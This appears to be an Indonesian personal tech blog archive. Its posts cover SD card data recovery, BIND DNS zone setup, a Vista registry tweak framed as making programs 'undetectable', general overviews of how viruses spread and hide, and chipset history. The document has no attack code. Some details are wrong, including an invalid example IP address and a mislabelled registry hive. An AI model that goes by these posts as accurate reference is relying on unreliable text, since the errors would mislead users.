11 July 2015

Memperbaiki Micro SD dan Flash Disk Yang Corrupt + Recovery Data part 1

flashdisk Pernah mengalami kerusakan memory card atau flash disk, seperti memory corrupt, tidak bisa di format bahkan tidak terbaca? berikut ini beberapa tips dan solusi untuk memperbaiki memory card yang rusak (corrupt), tidak bisa di format, tidak terdeteksi serta mengembalikan data (Recovery).



Alat yang dibutuhkan
  •  Komputer PC/laptop windows OS 
  • Micro SD/Flash Disk yang rusak 
  • Card Rider/kabel data 
Mengembalikan data (Recovery data) pada micro sd/flash disk. Bila agan semua mengalami micro SD atau flash disk tiba-tiba corrupt dan minta di format jangan langsung terburu-buru untuk di format tapi selamatkan data-data penting terlebih dahulu.
Data agan semua pasti akan kembali bila mengikuti Cara ini dengan syarat memory belum di format pada saat corrupt. Tetapi bila sudah terlanjut di format kemungkinan besar data-data agan akan kembali 50% hanya file yang berextensi dokument,zip, gambar,video.

Ada beberapa cara untuk memperbaiki serta mengembalikan datan pada Micro SD atau flash disk yang corrupt, cara pertama silahkan menggunakan metode ini :
  1. Unduh software icare data recovery. Install (dalam koneksi internet mati), pilih register untuk memasukan serial number . Di aplikasi iCare ini terdapat 4 menu dengan fitur masing-masing yang sama, pilih "Format Recovery".
  2. Tunggu hingga selesai searching semua data agan di memory.
  3. Jika sudah, centang semua data yang ingin agan selamatkan/kembalikan pilih "Save Files".
Untuk Cara yang lain akan saya posting pada part selanjutnya...

09 May 2008

mengenal DNS part 2: Konsep & Cara Kerja DNS

Membuat Domain Sendiri
Pada bagian ini kita akan membuat domain untuk jaringan lokal (LAN) misalnya intra.aki. Ada baiknya menggunakan domain yang benar-benar tidak ada di Internet sehingga kita tidak mengganggu domain siapa pun. Perlu diingat bahwa tidak semua karakter diperbolehkan untuk menjadi nama host yang dibolehkan hanya A-Z, a-z, 0-9 dan karakter '-'. Selain itu nama hostitu tidak bergantung pada huruf besar atau huruf kecil, jadi linux.intra.aki dan LINUX.Intra.AKI adalah sama. Kita masih mengedit file yang berasal dari paket caching-nameserver.
Tambahan di /etc/named.conf

Pertama kita mengedit file /etc/named.conf untuk menambahkan baris berikut:

zone "intra.aki" {
type master;
notify no;
file "intra.aki";


Yang berarti bahwa kita membuat zona domain intra.aki dimana kita adalah penguasa domain tersebut (type master) tetapi kita tidak ingin domain ini tersebar ke internet (notify no) dan informasi tentang anggota domainnya itu sendiri disimpan di file intra.aki di direktori yang ditentukan oleh keyword direktory dari blok options yang berisi /var/named.

File Zona intra.aki

Kemudian kita membuat file zona intra.aki yang berisi informasi tentang anggota domain.

; Zone file for intra.aki
@ IN SOA ns.intra.aki. root.intra.aki. (
2000091401 ; serial
8H ; refresh
3H ; retry
1W ; expire
1D ; default_ttl
)
NS ns
A 192.168.1.100
MX 10 linux.intra.aki.
MX 20 other.extra.aki.
localhost A 127.0.0.1
linux A 192.168.1.100
ns A 192.168.1.100
ftp CNAME linux
pop CNAME linux
www CNAME linux.intra.aki
cctv A 192.168.1.3


Perhatikan tanda '.' pada akhir dari nama domain di file ini. File zona ini mengandung 9 Resource Record(RR): satu SOA RR, satu NS RR, tiga CNAME RR dan empat AA RR. SOA merupakan singkatan dari Start Of Authority. Karakter “@” berarti nama domain dari zona yaitu intra.aki jadi baris kedua diatas berarti

intra.aki. IN SOA ....

NS adalah Name Server RR. Tidak ada “@” pada awal baris karena baris diatasnya dimulai dengan '@'. Menghemat waktu mengetiknya. Jadi baris NS bisa juga di tulisintra.aki. IN NS ns

Ini memberitahu DNS host mana yang menjadi name server bagi domain intra.aki yakni ns.intra.aki. 'ns' adalah nama yang biasa dipakai untuk name server, tetapi seperti web server yang biasa dinamakan www.anu namanya bisa diubah menjadi apapun.

Baris SOA adalah pembuka bagi semua file zona dan harus ada satu dalam setiap file zona. Baris tersebut menjelaskan zona, darimana dia datang (host bernama ns.intra.aki), siapa yang bertanggung jawab atas isinya (root@intra.aki), versi zona file (serial: 2000091401) dan parameter lainnya yang berhubungan dengan caching dan secondary DNS Server. Perlu diperhatikan bahwa ns.intra.aki haruslah nama host dengan A RR. Tidak diperbolehkan membuat CNAME RR untuk nama yang disebutkan di SOA.

RR A mendefinisikan alamat IP dari suatu nama host sedangkan CNAME mendefinisikan nama alias dari suatu host yang harus merujuk ke RR lainnya.

Ada satu lagi tipe RR pada file ini yaitu MX atau Mail eXchanger. RR ini berfungsi untuk memberitahukan sistem mail kemana harus mengirim e-mail yang di alamatkan ke seseorang@intra.aki dalam hal ini linux.intra.aki atau other.extra.aki. Angka sebelum nama host adalah prioritas MX. RR dengan angka terendah (10) adalah host yang harus dikirimkan email pertama kali. Jika tidak berhasil maka e-mail bisa dikirim ke host lain dengan angka yang lebih besar misalnya other.extra.aki yang mempunyai prioritas 20.
Zona Reverse

Zona Reverse diperlukan untuk mengubah dari alamat IP menjadi nama. Nama ini digunakan oleh berbagai macam server (FTP, IRC, WWW dsb) untuk menentukan apakah anda diperbolehkan mengakses layanan tersebut atau sejauh mana prioritas yang diberikan kepada anda. Untuk mendapatkan akses yang penuh pada semua layanan di Internet diperlukan zona reverse.
Tambahan di /etc/named.conf

Tambahkan baris berikut di /etc/named.conf

zone "1.168.192.in-addr.arpa" {
notify no;
type master;
file "192.168.1";
}


Seperti sebelumnya artinya kita membuat zona domain 1.168.192.in-addr.arpa yang tidak disebar ke internet dan disimpan di file /var/named/192.168.1
File zona 192.168.1

Sekarang kita membuat file zona 192.168.1 untuk domain 1.168.192.in-addr.arpa seperti berikut:

; Zone file for reverse zone 1.168.192.in-addr.arpa (192.168.1.x)
@ IN SOA ns.intra.aki. root.intra.aki. (
2000072801 ; serial
28800 ; refresh
7200 ; retry
604800 ; expire
86400 ; default_ttl
)
@ IN NS ns.intra.aki.
100 IN PTR linux.intra.aki.
3 IN PTR cctv.intra.aki.


Ada RR baru disini yakni PTR yang berfungsi untuk memetakan IP ke nama host

03 May 2008

mengenal DNS part 1: Konsep & Cara Kerja DNS

DNS (Domain Name System) adalah suatu system yang mengubah nama host (seperti linux.or.id) menjadi alamat IP (seperti 64.29.24.175) atas semua komputer yang terhubung langsung ke Internet. DNS juga dapat mengubah alamat IP menjadi nama host.

DNS bekerja secara hirarki dan berbentuk seperti pohon (tree). Bagian atas adalah Top Level Domain(TLD) seperti COM, ORG, EDU, MIL dsb. Seperti pohon DNS mempunyai cabang-cabang yang dicari dari pangkal sampai ke ujung. Pada waktu kita mencari alamat misalnya linux.or.id pertama-tama DNS bertanya pada TLD server tentang DNS Server yang melayani domain .id misalnya dijawab ns1.id, setelah itu dia bertanya pada ns1.id tentang DNS Server yang bertanggung jawab atas .or.id misalnya ns.or.id kemudian dia bertanya pada ns.or.id tentang linux.or.id dan dijawab 64.29.24.175

Sedangkan untuk mengubah IP menjadi nama host melibatkan domain in-addr.arpa. Seperti domain lainnya domain in-addr.arpa pun bercabang-cabang. Yang penting diingat adalah alamat IP-nya ditulis dalam urutan terbalik di bawah in-addr.arpa. Misalnya untuk alamat IP 64.29.24.275 prosesnya seperti contoh linux.or.id: cari server untuk arpa, cari server untuk in-addr.arpa, cari server untuk 64.in-addr.arpa, cari server 29.64.in-addr.arpa, cari server untuk 24.29.64.in-addr.arpa. Dan cari informasi untuk 275.24.29.64.in-addr.arpa. Pembalikan urutan angkanya memang bisa membingungkan.

DNS Server di Linux

DNS Server di linux biasanya dijalankan oleh program yang bernama named. Program ini merupakan bagian dari paket bind yang dikoordinasikan oleh Paul Vixie dari The Internet Software Consortium. Biasanya program ini terletak di /usr/sbin/named dan dijalankan pada waktu booting dari /etc/rc.d/init.d/named start. Agar named dijalankan pada setiap booting masukkan named ke daftar server yang harus distart dengan menggunakan ntsysv.

File Konfigurasi

File konfigurasi untuk named adalah /etc/named.conf yang seperti biasa adalah text file. Format file ini seperti format program C atau Pascal yakni tiap perintah diakhiri dengan ';' dan blok perintah di kurung dengan '{' dan '}'. Ada beberapa blok yang sering digunakan yaitu:

options
untuk mengatur konfigurasi server secara global dan menentukan default
zone
untuk mengatur konfigurasi zona DNS

Caching Only DNS Server

Caching Only DNS Server akan mencari jawaban dari pertanyaan DNS dan mengingat jawabannya ketika anda bertanya lagi. Ini akan mempersingkat waktu tunggu pada pertanyaan DNS berikutnya terutama jika anda menggunakan koneksi yang lambat seperti modem.

Konfigurasi

File konfigurasi Caching Only DNS sudah disediakan oleh RedHat dalam paket caching-nameserver anda tinggal menginstal paketnya dan mengedit file /etc/named.conf dan menambahkan baris berikut pada blok options:

forward first;
forwarders {
202.158.3.6;
202.158.3.7;
};


Kedua alamat IP diatas adalah alamat IP untuk DNS Server ISP saya yaitu CBN jika ISP anda berbeda anda harus menggantinya.

22 April 2008

membuat program tidak terdeteksi

para sobat blogger mungkin ingin membuat agar suatu program tidak tercatat oleh window vista meski program itu telah dijalankan, kali ini saya akan memposting bagaimana cara agar program tersebut tak tercatat atau invissible.

biasanya Oprating system windows vista akan mencatat atau merekam aplikasi yang dijalankan pada "frequently run programs". nach sekarang kita akan mengakalinya dengan beberapa langkah berikut:

1. klik [start] kemudiaan pilih menu run lalu ketikkan Regedit.exe.

2. masuklah ke subkey HKCR\Applications.

3. carilah subkey dengan nama file aplikasi yang ingin sobat blogger hilangkan, apabila sobat blogger tidak menemukan file yang sobat blogger tuju klik kanan saja pada shortcut yang ada pada "frequently run programs" lalu pilih propertis.

4. apabila para sobat blogger tak dapat juga file aplikasi yang dituju di HKCU\Applications, klik kanan pada subkey [applications] lalu pilih [NEW]>[KEY]dan isikan namanya dengan nama file aplikasi sobat blogger

5. setelah itu klik kanan mouse pada subkey file exe yang sobat blogger buat tadi lalu pilih [NEW] > [STRING VALUE]dan berikan nama string value tersebut dengan nama NoStartPage.

6. biarkan string value tadi tetap kosong.

7. nach ini langkah terakhir dan point penting tutup registry editornya lalu restart komputernya.

mudah bukan membuat suatu progaram yang tak terdektisi dalam os tapi ingat apapun kesalahannya yang disebabkan oleh tirik ini jangan salahkan saya, ingat sebelum para sobat blogger mengutak-ngatik program regsitry biasakan untuk membackupnya.

nb :

HKCU : HKEY_CLASSES_ROOT

19 April 2008

apa itu Virus Komputer bagian 3: jenis dan kemampuan

Jenis-Jenis Virus
-----------------

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
memberikan penjelasan tentang jenis jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
--------------
pasti kita semua sudah sangat sering mendengar tentang tipe virus ini. Virus ini
ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada komputer
mac dapat menjalankan aplikasi word maka virus ini bekerja pada komputer
bersistem operasi Mac.

contoh virus:
-variant W97M, misal W97M.Panther panjang 1234 bytes,akanmenginfeksi NORMAL.DOT
dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW :: 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan
bahasa makro, biasanya berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
--------------------
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (misal: monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (misal: floopy, drive lain selain c:\)

contoh virus :
-varian virus wyx (misal : wyx.CB) menginfeksi boot record dan
floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi

-varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic

-Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy;
panjang 520 bytes; karakteristik: menetap di memori (memory resident),
terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" stelah komputer
melakukan booting sebanyak 128 kali

3.Stealth Virus
----------------
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendaikan
nstruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .

contoh virus:
-Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes;
karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu

-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy dan motherboot record; panjang
520 bytes;menetap di memori; ukuran dan virus tersembunyi.

-Vmem(s): menginfeksi file file *.EXE, *.SYS, dan *.COM ; panjang fie 3275
bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.

-dll


4.Polymorphic Virus
-------------------
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
apat berubah ubah struktur.

-Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik :
menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi
dan dapat berubah ubah struktur.
-dll

5.Virus File/Program
--------------------
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari
virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus
-----------------------
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinyapekerjaan
yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file file *.EXE dan juga
menginfeksi Boot Sector.

Kriteria Virus
--------------

Suatu virus , dapat dikatakan adalah benar benar virus apabila minimal memiliki 5
kriteria (kriteria ini aku dapatkan dari sebuah sumber terpercaya :))
1.kemampuan suatu virus untuk mendapatkan informasi
2.kemampuannya untuk memeriksa suatu program
3.kemampuannya untuk menggandakan diri dan menularkan
4.kemampuannya melakukan manipulasi
5.kemampuannya untuk menyembunyikan diri.

Kemampuan untuk mendapatkan informasi
-------------------------------------
Pada umumnya suatu virus memerlukan daftar nama nama file yang ada dalam suatu
directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan
dia tulari, semisal virus makro yang akan menginfeksi semua file berekstensi *.doc
setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu
diperlukan agar virus dapat membuat daftar/dat semua file terus memilah dengan
mencari file file yang bisa ditulari. Biasanya data ini tercipta saat program yang
tertular atau terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan
segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) ,
sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap
program bervirus dijalankan biasanya dibuat hidden oleh virus (agar gak keliatan).

Kemampuan memeriksa suat program
--------------------------------
Suatu virus sangat diharuskan bisa untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, virus harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,karena jika sudah maka virus akan percuma menularinya 2 kali.

Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/memberi
tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh
virus tersebut.

Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.

Kemampuan untuk menggandakan diri
---------------------------------
syarat mutlak, maksudnya tanpa ini tak adalah virus. inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya,jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas file/program
yang diinfeksi.

Beberapa cara umum yang dilakukan oleh virus untuk menulari/
menggandakan dirinya adalah:

a.File/Program yanga akan ditulari dihapus atau diubah namanya. kemudian diciptakan
suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus
mengganti namanya dengan nama file yang dihapus)

b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file
file lain dengancara menumpangi seluruh file/program yang ada.

Kemampuan mengadakan manipulasi
-------------------------------
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari
suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan
sampai pengrusakan. rutin ini umumnya digunain buat memanipulasi program ataupun
mempopulerkan pembuatnya! Rutin ini memanfaatkan kemampuan dari suatu sistem
operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang
dimiliki sistem operasi.

misal:
a.Membuat gambar atau pesan pada monitor
b.mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pc
c.memanipulasi program/file yang ditulari
d.merusak program/file
e.Mengacaukan kerja printer , dsb

Kemampuan Menyembunyikan diri
------------------------------
Kemampuan Menyembunyikna diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terjlaksana.

langkah langkah yang biasa dilakukan adalah:

-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain
yang dianggap berguna oleh pemakai.

-Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh
komputer itu sendiri.

-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah
ukurannya.

-Virus tidak mengubah keterangan waktu suatu file.

-dan masih banyak lagi (cape nulisnya).

nah sekarang sobat bloger dah pada tahu resiko,jenis,kemampuan, apalagi udah kenal tinggal bagaimana caranya ngadepin tuch virus. ^_^

thanks to
sony.ak.com and ezine part 1.


03 April 2008

apa itu Virus Komputer bagian 2: Resiko

apa yach risiko virus terhadap komputer?

yang harus para sobat blogger ingat adalah Virus dapat menjangkau komputer melalui berbagai macam cara. Beberapa diantaranya adalah sebagai berikut.


  • Program dan document

  • Program komputer dan juga document dapat terinfeksi oleh virus. Ketika para sobat blogger men-sharing program atau document tadi kepada rekan-rekan sobat yang lain, maka hal ini membuat penyebaran virus akan semakin luas apalagi jika menyebar melalui jaringan LAN atau bahkan melalui internet.
  • Internet


  • sobat blogger bisa saja men-download program atau document yang sudah terinfeksi virus dari internet. Celah keamanan pada komputer Anda dapat membuat virus untuk memanfaatkannya. Virus dapat menular ke komputer Anda melalui internet secara otomatis tanpa Anda melakukan apa-apa sebelumnya.
  • E-mail


  • E-mail yang para sobat blogger terima setiap hari dapat saja membawa virus melalui attachment. ketika akan dijalankan program atau document yang ada pada attachment tadi, maka komputer akan terinfeksi oleh virus. Beberapa e-mail bahkan dapat mengandung script berbahaya yang akan dijalankan begitu sobat blogger melakukan preview terhadap e-mail atau membaca isi dari e-mail.
  • CD,disket atau removabel disk

  • Disket dapat membawa virus pada boot sector-nya. CD,disket atau removabel disk juga bisa berisi program yang sudah terinfeksi oleh virus.


File apa saja sich yang bisa diserang oleh virus?

Virus dapat menempelkan dirinya pada apa saja yang berjalan pada komputer. ada berbagai cara type serangan virus.

Program

Beberapa virus mampu untuk menginfeksi program komputer. Jika dijalankan program yang sudah terinfeksi virus tadi, maka kode virus secara otomatis juga akan dijalankan pertama kali. Virus-virus jenis ini muncul pada saat awal-awal munculnya virus di dunia komputer dan sampai sekarang masih merupakan ancaman yang serius apalagi dengan perkembangan internet yang mampu untuk mendistribusikan program dengan cepat ke seluruh dunia.

Document

Word processing atau spreadsheet, seperti MS Word atau MS Excel, seringkali menggunakan macro untuk mengotomatisasi suatu pekerjaan. Beberapa virus memanfaatkan fasilitas macro ini untuk menyebarkan dirinya sendiri ke document yang lainnya. Jika sobat blogger menjalankan document yang mengandung virus macro ini, maka dia akan meng-copy dirinya ke startup program yang membuka document tersebut dan akhirnya bisa menulari document lainnya yang masih bersih dari virus.

Boot sector
Ketika sobat blogger menghidupkan komputer, maka komputer akan mengakses suatu bagian pada disk yang disebut dengan "boot sector" dan akan menjalankan program yang nantinya akan memulai sistem operasi. Pada jaman awal-awalnya virus komputer, seringkali area boot sector ini ditumpuki dengan kode virus, sehingga ketika komputer dinyalakan dan mengakses boot sector, maka kode virus secara otomatis akan dijalankan pula.

02 April 2008

pengenalan chipset

apa itu chipset?

Chipset sangat penting untuk PC modern untuk meningkatkan kinerja.Banyak teknologi ditemui pada motherboard dan telah menyatu bersama controller ini yang sering kita sebut dengan chipset.



Ketika kita berbicara mengenai bus dan mainboard kita juga berbicara tentang chipset. chipset adalah sekumpulan controller chip yang terdapat pada motherboard.



Controller sangat berperan penting dalam CPU, chipset mengontrol bus dan CPU tanpa si kecil chipset ini RAM atau I/O bus tidak akan dapat berfungsi dalam CPU.

Teknologi baru Chipset

chipset Merupakan pusat komponen pada motherboard. Ketika teknologi baru dikenalkan dan terjadi secara berkala, sering kali menyertai chipset baru. Chipset baru akan ditambah dengan kemampuan:

Kecepatan tinggi untuk satu atau lebih bus

Utiliti untuk fasilitas baru (type RAM baru, bus baru dengan EIDE dll)


vendor
Ada beberapa supllier chipset untuk motherboard:

  • Intel

  • SIS

  • Opti

  • Via

  • ALi


Triton pertama dan kedua

Pada tahun 1995 muncul Chipset Intel triton 82430FX sebagai intel triton pertama ,dan pada februari 1996 triton generasi kedua muncul.2 chip set diperkenalkan yaitu 82430VX dan 82430HX.dan yang terakhir adalah HX merupakan salah satu yang tercepat.

VX dan HX

Kedua chipset ini serupa, mirip. Meskipun berbeda. 430HX terdiri dari 2 chip dan didesain untuk PC proffesional.. 430VX terdiri atas 4 chip tapi harganya lebih rendah dari pada HX dan ditujukan untuk komputer pada HomePC. Mari kita lihat bagian dari Chipset ini :
Chipset Terdiri dari :




Biasanya kedua chipsets terdiri dari PCI,IDE,ISA akselerator yang disebut juga PIIX3diamana dapat mengenali device driver dari windows 95 yang datang bersamaan dengan Board ASUS T2P4.

Perbedaan Antara HX dan VX

Secara umum telag diterima bahwa HX adalah chip dengan performa terbaik untuk menggambarkan 2 chipsets.tetapi VX mempunyai 2 fasilitas lain yaitu kemampuan SMBA (Shared Memory Buffer Architecture). Yang artinya diantara yang lain chip ini bisa mengintegerasikan kartu video pada motherboard dengan 1 atau 2 MB standar RAM.tekonologi ini diterapkan hanya untuk PC dengan harga rendah dan dimana telah didapat di ujikan.

VX set juga mendukung fast RAM type SD-RAM. HX tidak mendukung untuk ini. VX dapat mendukung sampai 128 MB RAM.

Controller HX memiliki cache 512 Kb . VX dan HX chip sets telah jarang dijumpai untuk sekarang karena telah digantikan dengan TX chipsets dimana produksi paling akhir dari intel untuk CPU dengan model soket 7.Sampai sekarang Ali dan VIA memproduksi chipset untuk motherboard soket 7.

Intel TX chip set

Chip sets terakhir untuk prosesor pentium dinamakan 82430TX yang mendukung 2 teknologi terbaru yaitu mendukung SDRAM dan Ultra DMA . Ultra DMA juga disebut ATA-33, dan itu merupakan standar dari hardisk interface, dimana memungkinkan untuk kecepatan transfer sampai 33Mbps.

Peningkatan Standar EIDE ini dipelopori di bawah nama Ultra DMA.dan test menunjukan bahwa ultra DMA dapat meningkatkan kecepatan antara 25-75 persen pada PIO mode 4 dan Ultra DMA merupakan Standar EIDE terbaru.

Controller yang terdapat pada chipset ini yaitu :



kolom-memetTX set merupakan update kemampuan dari VX set. Relatif untuk ini, TX pertamakalinya mendukung SDRAM dan Ultra DMA hard disks. TX chipset adalah chip terakhir untuk Socket 7 motherboards. Sesudah itu VIA and ALi mengambil alih dan melanjutkan feture ini.

Apakah super 7 itu ?

Setelah intel mengakhiri produksi socket 7 pada mainboard.perusahaan lain mengambil alih .AMD mensuply dengan CPU baru dan chipset terbaru pula.Sejak intel tidak mengembangkan lagi chipsets untuk motherboard soket 7 ,AMD dan lainnya melanjutkannya.

Perusahaan seperti VIA,ALI,SIS semuanya memproduksi chipset dengan kemampuan tinggi.yang mendukung untuk AGP dan 100 MHz Bus.

Bridge

kita lihat arsitektur dari chip modern yang terdiri dari utara dan selatan jembatan. Kedua jembatan ini pada dasarnya adalah jalur.yang berarti jalur antara data dari satu bus ke bus lainnya.

Socket 7 mainboards datang dari beberapa vendors.FIC mensuply mainboards dengan cache Level 2 sebesar 2 MB.

VIA Apollo MVP3

Sangatlah menarik mengikuti perusahaan seperti Via. Chipset untuk soket 7 menjanjikan performa yang sangat baik dengan 100 MHz bus terinteraksi dengan CPU dengan cache level 2 dan mendukung PC 100 SDRAM. Fasilitas lainnya:

  • AGP graphics

  • Mendukung sampai 1 GB RAM dalam 64 Mbit FPM/EDO/SDRAM/PC100 modules

  • 2 MB L2 cache

  • Virtual Clock Synchronization (VCS) for timing yang optimal


Apollo MVP3 chip set terdiri atas VT82C598AT system controller (476 pin BGA, the "north bridge") dan VT82C586B PCI to ISA bridge (208 pin PQFP, the "southbridge").

VIA Apollo MVP3 sangat baik untuk digunakan dengan mainboard soket 7 modern dan cpu yang kompatible seperti AMD K6-2 . tes menunjukan juga K6 dan Pentium MMX dapat bekerja dengan menggunakan chipset ini sampai 100 MHz bus.

VIA Apollo MVP4

Chipsets ini diperkenalkan pada tahun 1998 dan memberikan teknologi baru untuk soket 7 yaitu:
Terintegrasinya controller grafik dan yang terpenting adalah interface baru yaitu ATA 66 untuk peningkatan kemampuan hard disk

From VIA's own material:

VT82C501 SMA North Bridge

  • Integrated advanced 2D/3D AGP graphics with setup engine and DVD hardware acceleration.

  • 100 MHz CPU/memory bus.

  • 66/75/83/95/100 MHz FSB (Front Side Bus) capabilities.

  • Advanced ECC memory controller supports up to 768 MB PC100 SDRAM Virtual Channel SDRAM, EDO, FPM RAM.

  • Compatible with all Socket 7 processors.

  • Synchronous/Asynchronous AGP/ PCI/memory operation.

  • 492-pin BGA package.


VT82C686 Super South Bridge

  • Integrated AC-97 2.0 (meets PC98 Basic Audio spec.)/SoundBlaster-compatible legacy audio.

  • Integrated Super I/O: FDC, parallel port, serial port, IR, Voltage, temperature, and fan speed hardware monitoring.

  • UDMA/33 / ATA-66.

  • Advanced mobile PC power management.

  • USB.

  • ACPI.

  • compatible with all VIA Socket 7 and Slot 1 north bridges.

  • 352-pin BGA package.


Chipsets Untuk Pentium Pro

Intel's Pentium Pro adalah P6 processor awal, tetapi dengan Pentium II platform menjadi sangat populer.

Generasi ke 6 CPUs, Pentium Pro and Pentium II, mempunyai chip sets tersendiri.dan kembali pada tahun 1995 dan 1996 platform ini tidak menarik pada kebanyakan orang .sejak pentium pro dipasarkan.situasi berubah pada tahun 1997 dengan adanya pentium II.

82450GX
chipset ini datang pada tahun 1995, dan mendukung quad CPU configurations. Dan 4 pentium pro.

82440FX - Natoma
waktu yang sangat lama untuk intel menggunakan chipset generasi ke 6 ini.Chipset ini dapat mendukung 2 CPU pada motherboard yang sama.440FX terdiri dari 4 controller.dan hampir sama dengan 82430HX chipset.Biasanya chipset ini adalah 82371SB PCI-ISA akselerator dimana mendukung performansi yang baik untuk I/O Bus.

Chipset ini baik dan cepat dan mendukung SDRAM, Ultra DMA, AGP. features ini juga ditemukan pada chip set 82440LX.

82440LX

440LX dikenalkan pada August 1997. mendukung USB, SD-RAM and Ultra DMA. chip set is equivalent dengan 430TX.
feature baru lain adalah AGP, dimana adalah cepatnya graphics bus (Accelerated Graphics Port). AGP-bus memiliki bus 66 MHz – 2 kali dari PCI bus. Dan memberikan kemampuan baru pada video system dan meggeser PCI untuk kinerja video. AGP adapters juga memberikan memory untuk digunakan motherboard

82440BX

440BX chip set dipasarkan April 1998. Pada waktu itu menjadi populer untuk pentium II,Celeron juga pentium III.chip set terdiri dari 82443BX Host Bridge (north bridge) dan 82371EB PIIX4E(south bridge):

system bus 100 MHz. chip ini didesain untuk Pentium II and III chips, 350, 400, 450, 500, etc. MHz . e 100 MHz system bus , clock pengali dari 3.5 sampai 8. BX chipset mendukung 512 MB of memory (100 MHz SDRAM).

82440EX

EX chipset yang versi murah untuk LX chipset. chipset ini hanya mendukung DIMM sockets dengan 256 MB RAM dan hanya memiliki 3PCI slots. Untuk digunakan dengan Celeron cartridges.


82443EX PCI AGP Controller (PAC)

82371AB PCI-TO-ISA/IDE Xcelerator (PIIX4)

VIA Apollo Pro

Via juga memproduksi chip sets untuk Intel's Slot 1 cartridges (Celeron, Pentium II, danPentium III) dan socket 370. Via menjadi produsen terbesar chip ke dua , dan products mereka digunakan oleh beberapa vendor seperti Compaq dan Dell.

Apollo+ chipset hampir sama dengan Intel's BX chip set. Yang terdiri dari 2 chips yang mempunyai besar yang sama.dan hampir terintegrasi 1 GB RAM dimana BX hanya 512 MB.

chip set ini mendukung PC 133 SDRAM dan nanati juga untuk di tahun 2001 mendukung PC266 DDR RAM,VT82C693 dengan VT82C596A.



VT82C693 North Bridge

Mendukung semua Slot 1 (Intel Pentium ® II) dan Socket 370 (Intel Celeron ®) processors
AGP / PCI / ISA
66 / 100 MHz CPU external bus speed (internal 450MHz dan lebih tinggi)
AGP v1.0 dan PCI 2.1 .mendukung mode SideBand Addressing (SBA) .
akses CPU dan AGP secara bersamaan
Mndukung FP, EDO, dan SDRAM
DRAM type yang berbeda
mendukung 8 banks sampai 1GB DRAM
5-2-2-2-2-2-2-2 back-to-back accesses for EDO DRAM
6-1-1-1-2-1-1-1 back-to-back accesses for SDRAM
Pipelined transfers up to 533 MB/sec
Mendukung 5 PCI masters
WindowsTM 95 OSR-2 VXD dan dukungan WindowsTM 98 / NT5 miniport driver


VT82C596A South Bridge

- PC98-Compatible Mobile Power Management: mendukung antara ACPI(AdvancedConfiguration dan Power Interface) dan legacy (APM) power management
- Sideband signal support for PC/PCI and serial interrupt for docking and non-docking applications
